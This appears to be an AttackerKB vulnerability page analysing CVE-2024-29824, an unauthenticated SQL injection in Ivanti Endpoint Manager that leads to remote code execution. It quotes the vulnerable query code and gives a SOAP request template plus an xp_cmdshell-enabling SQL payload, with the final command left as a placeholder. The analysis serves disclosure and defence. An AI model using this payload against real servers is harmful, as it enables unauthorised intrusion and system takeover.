Very High
CVE-2024-29824
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
Very High
(1 user assessed)Very High
(1 user assessed)CVE-2024-29824
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code.
Add Assessment
Ratings
-
Attacker ValueVery High
-
ExploitabilityVery High
Technical Analysis
Ivanti Endpoint Manager (EPM) versions 2022 SU5 and prior are vulnerable to SQL injection and a patch has been released, as described in the official advisory and the related KB article. It is possible to leverage this vulnerability to achieve unauthenticated remote code execution.
The function RecordGoodApp()
in AppMonitorAction.cs
is responsible for handling reports of “good” applications.
159 private static void RecordGoodApp( 160 LanDeskDatabase database, 161 string[] tokens, 162 DateTime reportDate, 163 int computer_idn) 164 { 165 try 166 { 167 GoodApp goodApp = new GoodApp(tokens); 168 try 169 { 170 string sql1 = string.Format("Select ReportedGoodApps_Idn from ReportedGoodApps where md5 = '{0}'", (object) goodApp.md5); 171 DataRow row1 = database.ExecuteRow(sql1);
As can be seen in line 170, goodApp.md5
value is used to construct a SQL query without any sanitization. It happens that this value is user-supplied and this function can be reached through the EventHandler
web service endpoint. The attack consists in sending a SOAP request to this endpoint, substituting the MD5 value with the malicious SQL command:
<?xml version="1.0" encoding="utf-8"?> <soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"> <soap12:Body> <UpdateStatusEvents xmlns="http://tempuri.org/"> <deviceID>string</deviceID> <actions> <Action name="string" code="0" date="0" type="96" user="string" configguid="string" location="string"> <status>GoodApp=1|md5=<SQL_COMMAND></status> </Action> </actions> </UpdateStatusEvents> </soap12:Body> </soap12:Envelope>
To achieve remote code execution, the MS-SQL special command xp_cmdshell
can be used this way:
;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;EXEC xp_cmdshell '<MALICIOUS COMMAND>'--
A Metasploit module is already available for this attack.
Note that this is an unauthenticated attack and it usually results in privileged access to the vulnerable system. Since Ivanti EPM is usually running as an NT Service
user, this can be easily escalated to a NT AUTHORITY\SYSTEM
privileged user.
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportCVSS V3 Severity and Metrics
General Information
Vendors
- ivanti
Products
- endpoint manager,
- endpoint manager 2022
Exploited in the Wild
Would you like to delete this Exploited in the Wild Report?
Yes, delete this reportReferences
Exploit
A PoC added here by the AKB Worker must have at least 2 GitHub stars.
Additional Info
Technical Analysis
Report as Emergent Threat Response
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below: